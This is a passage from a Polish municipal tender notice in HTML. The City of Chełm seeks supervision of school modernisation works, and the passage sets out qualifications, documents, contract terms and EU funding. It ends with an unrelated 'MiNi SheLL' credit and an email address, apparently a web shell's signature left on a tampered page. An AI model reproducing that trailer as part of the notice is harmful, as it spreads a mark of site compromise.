b -wykazu osób które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 5 do SIWZ).
Przedłożony wykaz powinien zawierać:
     - co najmniej 1 osobę   - będącą Koordynatorem zespołu inspektorów, 
     - co najmniej 1 osobę - będącą inspektorem nadzoru robót konstrukcyjno -   
     budowlanych, posiadającą co najmniej 3-letnią praktykę oraz niezbędne  
     uprawnienia budowlane w specjalności konstrukcyjno - budowlanej bez   
     ograniczeń, które uprawniają  do kierowania robotami budowlanymi,
     - co najmniej 1 osobą - będącą inspektorem nadzoru robót sanitarnych   
     posiadającą co najmniej 3-letnią praktykę oraz niezbędne uprawnienia  
     budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń  
     cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych         
     bez ograniczeń, które uprawniają do kierowania robotami budowlanymi,
  - co najmniej 1 osobą - będącą inspektorem nadzoru robót elektrycznych posiadającą co najmniej 3-letnią praktykę oraz niezbędne uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, które uprawniają          do kierowania robotami budowlanymi, 
- co najmniej 1 osobą - będącą inspektorem nadzoru robót drogowych, posiadającą co najmniej 3-letnią praktykę oraz niezbędne uprawnienia budowlane w specjalności drogowej bez ograniczeń, które uprawniają             do kierowania robotami budowlanymi,
Zamawiający określając wymogi w zakresie posiadanych uprawnień budowlanych dopuszcza odpowiadające uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające uprawnienia wydane osobie będącej obywatelem państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12 a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2006 r. Nr 156, poz. 1118 z późn. zm) oraz ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r. Nr 63, poz. 394).
c -  oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu  
     zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają   
     obowiązek posiadania takich uprawnień (załącznik nr 6 do SIWZ).
Zamawiający przy ocenie spełniania tego warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia weźmie pod uwagę łączny potencjał kadrowy  Wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący sytuacji ekonomicznej i finansowej. Ocena spełniania przez Wykonawców wymienionego warunku udziału w postępowaniu  będzie dokonana według formuły spełnia/nie spełnia wymagany warunek na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ). Zamawiający przy ocenie spełniania tego warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia weźmie pod uwagę łączną sytuację ekonomiczna i finansową Wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawca reprezentowany przez pełnomocnika winien złożyć wraz z oferta stosowny dokument pełnomocnictwa w oryginale (ewentualnie notarialnie poświadczoną kopię pełnomocnictwa).
2.   Jeżeli najkorzystniejsza ofertę złożą Wykonawcy wspólnie ubiegający się o udzielenie zamówienia przed zawarciem umowy w sprawie zamówienia publicznego złożą umowę regulującą współpracę tych Wykonawców (art. 23 ust. 4 ustawy Prawo zamówień publicznych).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia niżej wymienionych okoliczności
z uwzględnieniem podanych warunków ich wprowadzenia:
1) Zmiany osobowe:
 - zmiany osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami,                o których mowa w SIWZ spowodowane:   
     - niewywiązywaniem się z obowiązków wynikających z umowy,
     - inną przyczyną niezależną od Wykonawcy (np. rezygnacją itp.),
     - śmiercią, chorobą lub innym zdarzeniem losowym.
W przypadku wystąpienia w/w okoliczności zmiana osób będzie wymagała pisemnego zaakceptowania przez Zamawiającego.
2) Zmiana terminu wykonania umowy spowodowana:
    - szczególnie niesprzyjającymi warunkami atmosferycznymi uniemożliwiającymi   
    prowadzenie robót,
    - następstwem zmian wytycznych lub zaleceń instytucji, która przyznała środki        
    na sfinansowanie zamówienia na usługę stanowiącą przedmiot zamówienia        
    lub/i na roboty budowlane,
    - innymi przyczynami zewnętrznymi niezależnymi od Zamawiającego                  
    oraz  Wykonawcy skutkującymi niemożliwością prowadzenia robót,
    -  następstwem okoliczności leżących po stronie Zamawiającego, w szczególności  
    wstrzymanie lub zawieszenie robót przez Zamawiającego, 
-  zmianą terminu wykonania robót budowlanych, nad którymi będzie sprawowany
nadzór inwestorski.
       W przypadku wystąpienia którejkolwiek z w/w okoliczności termin wykonania umowy może  
       ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania jej  
       przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.
      3) Zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ  
         na realizację przedmiotu umowy.
    W przypadku zmiany stawki podatku od towarów i usług (VAT) Zamawiający zmieni umowę w następujący sposób:
- jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość  zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez Wykonawcę;
- jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość  zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez Wykonawcę;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://chelm.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzędu Miasta Chełm, w Biurze Inwestycji Miejskich pok. 19A, ul. Lubelska 63, 22-100 Chełm.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.09.2010 godzina 10:00, miejsce: Oferty należy składać w Kancelarii Urzędu Miasta Chełm (parter), ul. Lubelska 65, 22-100 Chełm lub za pośrednictwem poczty.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Modernizacja budynków Zespołu Szkół Ogólnokształcących Nr 6 wraz z infrastrukturą sportowo-rekreacyjną w Chełmie współfinansowany z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007 - 2013; Oś Priorytetowa VIII: Infrastruktura Społeczna. Działanie 8.2 Infrastruktura  szkolna          i sportowa.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com